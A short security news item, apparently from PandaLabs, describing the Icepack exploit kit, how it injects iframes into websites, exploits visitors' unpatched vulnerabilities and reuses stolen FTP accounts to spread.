Malicious tool Icepack installs malware through exploits

PandaLabs has discovered a new malicious tool that installs malware through exploits. This tool is called Icepack and is sold on the Internet for US$400. This tool joins others recently detected by PandaLabs, such as Mpack, XRummer, Zunker, Barracuda, Pinch, etc., confirming the profitable business being developed on the Internet based on creating and selling applications to carry out malicious actions.

Icepack infects computers through the following process: the application accesses a web page to which it adds an iframe reference pointing to the server where the application is installed. The main innovation in Icepack is that the tool adds the iframe. Previous applications like Mpack needed a hacker to manually access the web pages in which to insert it.

When a user visits one of these malformed pages, the iframe activates Icepack, which looks for vulnerabilities on the user’s computer. If it finds one, it will download the exploit for this vulnerability to the computer. An important feature of Icepack is that it uses exploits corresponding to the latest vulnerabilities to appear. The reason is that as they are more recent, users are less likely to have updated their computers to resolve these security flaws.
From then on, the cyber-crook can download any type of malware to the affected computers. Given the cost of the tool, it is most likely that the type of malware downloaded is the malware most frequently used to steal confidential data, which allows them to carry out online fraud (Trojans, spyware, bots, etc.).

Another innovation of Icepack is that it combines an ftps checker and an iframer. The first helps cyber-crooks to exploit the information about the FTP accounts they have stolen from affected computers. The data from these accounts is passed through the checker to verify if it is valid. The valid data will be passed to the iframe, which will insert the iframe pointing to Icepack in the account. By doing this, the application can start its “lifecycle” again.

Share this